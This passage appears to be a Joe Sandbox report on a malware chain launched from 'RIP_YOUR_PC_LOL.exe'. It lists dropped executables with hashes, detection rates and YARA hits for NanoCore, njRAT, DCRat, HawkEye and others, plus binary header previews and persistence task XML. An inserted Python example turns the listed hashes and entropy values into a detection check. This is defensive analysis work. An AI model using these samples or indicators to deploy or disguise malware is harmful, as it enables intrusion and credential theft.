                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:7S0BFZcouRlCLNkbI7u2KrMmCI44axa7AR5Mp:7SkZolCLybI7xI4xxa7Wap
                                                                                                        MD5:78D40B12FFC837843FBF4DE2164002F6
                                                                                                        SHA1:985BDFFA69BB915831CD6B81783AEF3AE4418F53
                                                                                                        SHA-256:308A15DABDC4CE6B96DD54954A351D304F1FCB59E8C93221BA1C412BCDFD1C44
                                                                                                        SHA-512:C6575E1771D37DED4089D963BEA95DEAC78B329ED555C991D7C559EE1970DD0887A965E88C09981529ADC9C25DF5CFD3D57E3DCE6724DA1F01F1198F0F460B79
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: Metadefender, Detection: 29%
                                                                                                        • Antivirus: ReversingLabs, Detection: 86%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...w>.a.................@... ...............P....@..................................I.......................................D..P....p..t...............................................................................d............................text....:.......@.................. ..`.data........P.......P..............@....rsrc...t....p.......`..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\AppData\Roaming\Opus.exe
                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1305
                                                                                                        Entropy (8bit):5.090556205433367
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0V75xtn:cbk4oL600QydbQxIYODOLedq3K5j
                                                                                                        MD5:1211D31E3B2DF2F76E97FEF49A693566
                                                                                                        SHA1:47DA0FC84FEF52FE80D25341A9A2DC97117841F3
                                                                                                        SHA-256:8DD44C774959C9CA5E2557721C4C09ACCC5C5307F426D4A015AEF61A8410F45C
                                                                                                        SHA-512:05DE66143F4D1FCAE7BB927CF508AFD02DFA910D2D244D0EDD7545A9BF9F4B478C3B00D387C84495A14865BCF565D3A25201E6E61C85DE7DB37E4EA4938C1E49
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                                                                                                        Process:C:\Users\user\AppData\Roaming\Opus.exe
                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1310
                                                                                                        Entropy (8bit):5.109425792877704
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0R3xtn:cbk4oL600QydbQxIYODOLedq3S3j
                                                                                                        MD5:5C2F41CFC6F988C859DA7D727AC2B62A
                                                                                                        SHA1:68999C85FC7E37BAB9216E0099836D40D4545C1C
                                                                                                        SHA-256:98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
                                                                                                        SHA-512:B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                                                                                                        Process:C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):549556
                                                                                                        Entropy (8bit):6.964847007042997
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:eKmlz464jAfhe5pUC1jAXBoFACBfz6JMW0rwrsu:oz4d/5iCj0BoNBb6Jh3
                                                                                                        MD5:0FD7DE5367376231A788872005D7ED4F
                                                                                                        SHA1:658E4D5EFB8B14661967BE2183CC60E3E561B2B6
                                                                                                        SHA-256:9083992637E90E412E6F4E77331EB69EE8DB821C54BBC38533E0F889CC4CA9DD
                                                                                                        SHA-512:522D5BE2803FBCE0D12C325CC2EF1E3A92CEC03AEBA7D1164530093AD58CAECD827DD557CA3C182A66C6667150E731DE37BB552D19425F96CC78FE3423E1A863
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: Metadefender, Detection: 29%
                                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .4.d.Z.d.Z.d.Z.z..u.Z.z....Z.z..S.Z.CC!.g.Z.d.[..Z.z..e.Z.z..e.Z.z..e.Z.Richd.Z.................PE..L....:._............................. ............@.................................d.......................................8Y..(....................*...8..........P................................O..@............................................text...0........................... ..`.rdata..............................@..@.data........p.......T..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2101248
                                                                                                        Entropy (8bit):7.055994450169564
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:49152:XkSw2TRlsQ1k0+eDE/C9fLtGoDs9cXpJGy:0EHZ/rDjfLe9cy
                                                                                                        MD5:DBF9DAA1707B1037E28A6E0694B33A4B
                                                                                                        SHA1:DDC1FCEC1C25F2D97C372FFFA247969AA6CD35EF
                                                                                                        SHA-256:A604A3FF78644533FAC5EE9F198E9C5F2FA1AE2A5828186367A9E00935CFF6B6
                                                                                                        SHA-512:145B606FFD58554050FF8712DDB38C1C66DD5F33EA15FD48474E1C165B2C0348D2413E16C7AD07FF1C65CE71E2BE23E3758E6D48C4F2454D5407982119706BFD
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: MALWARE_Win_BlackMoon, Description: Detects executables using BlackMoon RunTime, Source: C:\Users\user\AppData\Roaming\22.exe, Author: ditekSHen
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                         • Antivirus: Metadefender, Detection: 38%
                                                                                                        • Antivirus: ReversingLabs, Detection: 86%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(...I.U.I.U.I.U.U.U.I.U.F.U.I.U^U.U.I.U.o.U~I.U5V.U.I.U.F.U.I.U.I.U.K.U.o.U.I.U.I.U.I.U5V.U.I.URich.I.U................PE..L....{.].................@...................P....@..........................P".................................................@....@"..............................................................................................................text....4.......@.................. ..`.rdata..lP...P...`...P..............@..@.data...........P..................@....rsrc........@"....... .............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\AppData\Roaming\4.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):577536
                                                                                                        Entropy (8bit):5.535850322343421
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:aWMT5dtGv3Kom+qn4e9PtlAc7+Q4hMY1FOhcV:bMT5Sw++4ilAZ1OhcV
                                                                                                        MD5:748A4BEA8C0624A4C7A69F67263E0839
                                                                                                        SHA1:6955B7D516DF38992AC6BFF9D0B0F5DF150DF859
                                                                                                        SHA-256:220D8F8FF82D413C81BD02DFA001E1C478E8FBEA44BAD24F21B3A5284E15632E
                                                                                                        SHA-512:5FCDFDDCE3CC2E636001ED08C5F2F7590AADAA37C091F7BA94E519D298E284362721F1859C6FFBF064AE23E05D4E0E9754B515396812FBE9F9028497396799FD
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\user\AppData\Roaming\3.exe, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Users\user\AppData\Roaming\3.exe, Author: ditekSHen
                                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\3.exe, Author: ditekSHen
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                         • Antivirus: Metadefender, Detection: 47%
                                                                                                        • Antivirus: ReversingLabs, Detection: 82%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a............................N.... ........@.. .......................@............@.....................................K....... .................... ....................................................... ............... ..H............text...T.... ...................... ..`.rsrc... ...........................@..@.reloc....... ......................@..B................0.......H...........l............................................................*&.(......*J..(........(.....*"..}....*^..}.....(........}....*.0..{.............."5-...YE....5...1...N...N...5...+... ..+...".<+>..\5.../.,+...\.!++..{..+...}..+...+....+...+...+...+...+...+...+..*..0..#..............n..+...t..+....+....+...+..*..0..............R.....o....(........s.......8&.......o....(............9....+......+....;....8.........._,.....+......,.....XT.o......8i...........,..r...p..o..
                                                                                                        Process:C:\Users\user\AppData\Roaming\healastounding.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):579127
                                                                                                        Entropy (8bit):7.206124159305961
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:xzxzTDWikLSb4NS7IODX+KEe+gpSwcxRLe4:bDWHSb4Ngse+USTR64
                                                                                                        MD5:E6DACE3F577AC7A6F9747B4A0956C8D7
                                                                                                        SHA1:86C71169025B822A8DFBA679EA981035CE1ABFD1
                                                                                                        SHA-256:8B4B846FE1023FA173AB410E3A5862A4C09F16534E14926878E387092E7FFB63
                                                                                                        SHA-512:1C8554D3D9A1B1509BA1DF569EDE3FB7A081BEF84394C708C4F1A2FB8779F012C74FBF6DE085514E0C8DEBB5079CC23C6C6112B95BF2F0AB6A8F0BD156A3E268
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                         • Antivirus: Metadefender, Detection: 17%
                                                                                                        • Antivirus: ReversingLabs, Detection: 75%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...+...._......._..'...._f.'...._..'...Rich&...........PE..L....).`.....................2...............0....@.......................................@.........................0...4...d...<....0...R......................|"......T............................U..@............0..`...... ....................text............................... ..`.rdata.."....0......................@..@.data...(7..........................@....didat....... ......................@....rsrc....R...0...T..................@..@.reloc..|".......$...&..............@..B................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\AppData\Roaming\healastounding.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1241088
                                                                                                        Entropy (8bit):7.769765528202914
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24576:mMyMzC8+ovorlBtugg0uHqJkSkSZI7C8JaYRHwOwhNGWwQ58Xaj8rac:mMHF+lxuPHYkSfI77aYRQOayac
                                                                                                        MD5:8F1C8B40C7BE588389A8D382040B23BB
                                                                                                        SHA1:BEF5209AE90A3BD3171E1E0BE4E8148C4CCD8A6A
                                                                                                        SHA-256:ED58FFEE46A583C177C792B56C9FC20CCD9509D125F2E3FC90C4F48DE7E2C2A1
                                                                                                        SHA-512:9192B6F2F8320A728C445F9CD6E6D66495AD0EBEBD7FF193DC09EE8AE57B3933C1B75DC208E7D638DB273CB9D31B4CA24EE7BFD9729FF0CDBF432D72BB322B1F
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                         • Antivirus: Metadefender, Detection: 26%
                                                                                                        • Antivirus: ReversingLabs, Detection: 86%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.a..................... ......6(............@.................................k...........................................P.......t...............................................................................d............................text...P........................... ..`.data...............................@....rsrc...t...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Users\user\AppData\Roaming\Opus.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8
                                                                                                        Entropy (8bit):3.0
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:tiK:f
                                                                                                        MD5:A032CE284A49FD6CF341559395411B90
                                                                                                        SHA1:9A556CCC1AE76361E16EC13A4549BCEB79D6F383
                                                                                                        SHA-256:CE980B79958BE0B1DA2EFC904A80EFD8FA0B1E3607152100190A001AA399E1F5
                                                                                                        SHA-512:14D6696A4B21C6FBD461FED6F895E0FDAE6706F3DE897E4EE2E29EC9C90F129DE423F3D3476D6BABF4AE1EFAB365C92D697B1355A72CE308DBE2EED97F840E05
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:!a:.p..H
                                                                                                        Process:C:\Users\user\AppData\Roaming\Opus.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):42
                                                                                                        Entropy (8bit):4.15091348260215
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:oNN+EaKC5fMN:oNN7aZ5fMN
                                                                                                        MD5:F00851831855D57C5FAB0A8B025C3ECE
                                                                                                        SHA1:B44A5459ED55DEF8D4F1283651C031B98BBD4F36
                                                                                                        SHA-256:A9CC872641CE9C8FA8134CB799FE95C76299F4202119B72F62129667DB38FC33
                                                                                                        SHA-512:4C9B0071735811D3E59E3E0115EECEF168AA3944D71F7C507AF3C046FA8234E020051E13DD5A2D0E4EE347A99263139697D8382AE1D465F9CED0A4315950D7AA
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:C:\Users\user\AppData\Roaming\Opus.exe
                                                                                                        Process:C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):49
                                                                                                        Entropy (8bit):1.2701062923235522
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:/l1PL3n:fPL3
                                                                                                        MD5:CD8FA61AD2906643348EEF98A988B873
                                                                                                        SHA1:0B10E2F323B5C73F3A6EA348633B62AE522DDF39
                                                                                                        SHA-256:49A11A24821F2504B8C91BA9D8A6BD6F421ED2F0212C1C771BF1CAC9DE32AD75
                                                                                                        SHA-512:1E6F44AB3231232221CF0F4268E96A13C82E3F96249D7963B78805B693B52D3EBDABF873DB240813DF606D8C207BD2859338D67BA94F33ECBA43EA9A4FEFA086
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:........................................user.
                                                                                                        Process:C:\Users\user\AppData\Roaming\mediaget.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):37888
                                                                                                        Entropy (8bit):5.575438262402469
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:HLWZcaCisD/WRdL5kyc/Ss4fzrngNsIhOrAF+rMRTyN/0L+EcoinblneHQM3epzN:iZcID5nc/Ss4HysIsrM+rMRa8NuM0t
                                                                                                        MD5:8EEDC01C11B251481DEC59E5308DCCC3
                                                                                                        SHA1:24BF069E9F2A1F12AEFA391674ED82059386B0AA
                                                                                                        SHA-256:0184983A425FEF55D46B7E0EB729A245730EE26414EBE4B155917C0124A19C2D
                                                                                                        SHA-512:52388313B21F14AA69C8B37E0FE0B73F66AA92F08651A16C820AAE65D341DC1AF6B48F3C8D4F657AC990EEAF4B9A01AE769BCA4D3625550011708697D22B69CC
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe, Author: ditekSHen
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe, Author: Brian Wallace @botnet_hunter
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a................................ ........@.. ....................................@.....................................W.......@............................................................................ ............... ..H............text....... ...................... ..`.rsrc...@...........................@..@.reloc..............................@..B........................H........e...E..........................................................&.(......**..(......*.s.........s.........s.........s..........*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0...........~....o.....+..*.0.............(....(.....+..*...0............(.....+..*.0................(.....+..*.0............(.....+..*.0.. ...................,.(...+.+.+....+...*.0...........................**..(......*....0..&........~..............,.(...+.
                                                                                                        Process:C:\Users\user\AppData\Roaming\healastounding.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):208384
                                                                                                        Entropy (8bit):7.449669736966968
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:cLV6Bta6dtJmakIM5zEN/wjwJsvle+o9f/N:cLV6Btpmk1Elepd
                                                                                                        MD5:759185EE3724D7563B709C888C696959
                                                                                                        SHA1:7C166CC3CBFEF08BB378BCF557B1F45396A22931
                                                                                                        SHA-256:9384798985672C356A8A41BF822443F8EB0D3747BFCA148CE814594C1A894641
                                                                                                        SHA-512:ED754357B1B995DE918AF21FECD9D1464BDEA6778F7AB450A34E3AAE22BA7EEBC02F2442AF13774ABFDF97954E419EC9E356B54506C7E3BF12E3B76EE882FA2C
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                         • Rule: Nanocore_RAT_Gen_2, Description: Detects the Nanocore RAT, Source: C:\Users\user\AppData\Roaming\Opus.exe, Author: Florian Roth
                                                                                                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Users\user\AppData\Roaming\Opus.exe, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\AppData\Roaming\Opus.exe, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: C:\Users\user\AppData\Roaming\Opus.exe, Author: ditekSHen
                                                                                                        • Rule: NanoCore, Description: unknown, Source: C:\Users\user\AppData\Roaming\Opus.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'.T.....................d........... ........@.. ......................................................................8...W.... ..$`........................................................................... ............... ..H............text........ ...................... ..`.reloc..............................@..B.rsrc...$`... ...b..................@..@................t.......H...........T............................................................0..Q........o5.......*.o6....-.&......3+..+.... ....3......1..... 2.... ....3.... .......*.*....0..E.......s7....-(&s8....-&&s9....,$&s:........s;........*.....+.....+.....+.....0..........~....o<...*..0..........~....o=...*..0..........~....o>...*..0..........~....o?...*..0..........~....o@...*..0.............-.&(A...*&+...0..$.......~B........-.(...+.-.&+..B...+.~B...*.0.............-.&(A...*&+...0..
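The dropped-file records above are mostly useful as indicators: each carries MD5/SHA1/SHA-256 hashes, a "Malicious" verdict and an 8-bit entropy value (the packed 1241088-byte sample sits at 7.77, the plain .NET droppers near 5.5). Note also that the MD5 of that 1241088-byte file, 8F1C8B40C7BE588389A8D382040B23BB, reappears a few records later as the file name of a process, 8f1c8b40c7be588389a8d382040b23bb.exe, i.e. the chain names a dropped payload after its own hash. The following is an added example, not part of the Joe Sandbox report or any of the tooling it names: it parses a small excerpt of the report's own "Key:Value" line format into records, builds a hash set from the entries marked malicious, and classifies an arbitrary byte buffer by hash match and by entropy, computing entropy on the same bits-per-byte scale the report uses. The excerpt embedded in the block is constructed (hashes copied from the records above, other fields trimmed), and the 7.2 entropy threshold is an assumption for this example rather than a value the report states.

```python
"""Added example: turn Joe Sandbox dropped-file records into a hash/entropy IOC check.
Not part of the report; the excerpt below is constructed from the records on the page."""
import hashlib
import math
from collections import Counter
from typing import Dict, List, Set

# Constructed excerpt in the report's "Key:Value" layout. Hashes are copied from the
# dropped-file records above; only the fields this example needs are reproduced.
REPORT_EXCERPT = """\
Process:C:\\Users\\user\\AppData\\Roaming\\healastounding.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1241088
Entropy (8bit):7.769765528202914
MD5:8F1C8B40C7BE588389A8D382040B23BB
SHA-256:ED58FFEE46A583C177C792B56C9FC20CCD9509D125F2E3FC90C4F48DE7E2C2A1
Malicious:true
Process:C:\\Users\\user\\AppData\\Roaming\\Opus.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):42
Entropy (8bit):4.15091348260215
MD5:F00851831855D57C5FAB0A8B025C3ECE
SHA-256:A9CC872641CE9C8FA8134CB799FE95C76299F4202119B72F62129667DB38FC33
Malicious:false
"""


def parse_records(text: str) -> List[Dict[str, str]]:
    """Split flat Key:Value lines into one dict per dropped file.
    In the report layout every record begins with a 'Process:' line."""
    records: List[Dict[str, str]] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or ":" not in line:
            continue
        key, value = line.split(":", 1)
        if key == "Process":
            records.append({})
        if records:
            records[-1][key] = value
    return records


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, the scale of 'Entropy (8bit)' in the
    report: 0.0 for constant data, 8.0 for a uniform byte distribution."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def ioc_hashes(records: List[Dict[str, str]], only_malicious: bool = True) -> Set[str]:
    """Collect lowercase MD5/SHA1/SHA-256 values, by default only from records the
    sandbox marked Malicious:true (the 42-byte path file above is excluded)."""
    hashes: Set[str] = set()
    for rec in records:
        if only_malicious and rec.get("Malicious") != "true":
            continue
        for key in ("MD5", "SHA1", "SHA-256"):
            if key in rec:
                hashes.add(rec[key].lower())
    return hashes


def classify(data: bytes, iocs: Set[str], packed_threshold: float = 7.2) -> dict:
    """Hash a buffer and compare against the IOC set; additionally flag PE images
    (MZ header) whose entropy is in the packed/encrypted range. The threshold is an
    assumption for this example: below the report's 7.77 packed sample, above its
    ~5.5 unpacked .NET droppers."""
    md5 = hashlib.md5(data).hexdigest()
    sha256 = hashlib.sha256(data).hexdigest()
    entropy = shannon_entropy(data)
    is_pe = data[:2] == b"MZ"
    return {
        "md5": md5,
        "sha256": sha256,
        "entropy": round(entropy, 3),
        "known_ioc": md5 in iocs or sha256 in iocs,
        "suspicious_entropy": is_pe and entropy >= packed_threshold,
    }


if __name__ == "__main__":
    iocs = ioc_hashes(parse_records(REPORT_EXCERPT))
    # Constructed inputs: a high-entropy "PE" and a zero-filled buffer.
    print(classify(b"MZ" + bytes(range(256)) * 4, iocs))
    print(classify(b"\x00" * 4096, iocs))
```

Hash matching only catches byte-identical drops; the entropy check is the cheap complement for repacked variants, and the report's own "Entropy (8bit)" column is the calibration data for choosing the threshold.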
                                                                                                        Process:C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):913920
                                                                                                        Entropy (8bit):7.376805169532317
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:ypEQtqB5urTIoYWBQk1E+VF9mOx9wi1T0hnbkOWAvyPx4+c/bUUCy:HQtqBorTlYWBhE+V3mO5vWgxE/nb
                                                                                                        MD5:ED666BF7F4A0766FCEC0E9C8074B089B
                                                                                                        SHA1:1B90F1A4CB6059D573FFF115B3598604825D76E6
                                                                                                        SHA-256:D1330D349BFBD3AEA545FA08EF63339E82A3F4D04E27216ECC4C45304F079264
                                                                                                        SHA-512:D0791EAA9859D751F946FD3252D2056C29328FC97E147A5234A52A3728588A3A1AAA003A8E32863D338EBDCA92305C48B6FA12CA1E620CF27460BF091C3B6D49
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, Author: Arnim Rupp
                                                                                                        • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, Author: Joe Security
                                                                                                        • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\Users\user\AppData\Roaming\Pluto Panel.exe, Author: JPCERT/CC Incident Response Group
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        Reputation:unknown
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C.a.....................4........... ........@.. ....................................@.....................................S.... ...2...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc....2... ...2..................@..@.reloc.......`....... ..............@..B........................H.......0}..h..............X...........................................2s..........*....0...........~......(......~....o....~....o..........9.......~....o.........+G~.....o......o........,)...........,.~.....~.....o....o.......................1.~.....~....o......o.....~....~....o....o......~.....(....s....o..........(.........*...................0.. .........(....(..........(.....o......*....................(......(.......o.......o.......o.......o......*.R..(....o....o......
                                                                                                        Process:C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):16322590
                                                                                                        Entropy (8bit):7.8569139750386485
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:393216:G7BPkdKzrZciLxv8naSNtPr5rn57M84UTB9xO5/VWvJKJPkwdnfZ:uBPQwxMR7pn5qUTB9xOFVWvJKJPkwdnB
                                                                                                        MD5:A071727B72A8374FF79A695ECDE32594
                                                                                                        SHA1:B2ABA60B3332D6B8F0A56CEA310CDC2BDB4F9FFC
                                                                                                        SHA-256:8ECDFE60EACB5BF647AE69BCBC41DD727EA3089E92B4B08EBCA3A8D162E50745
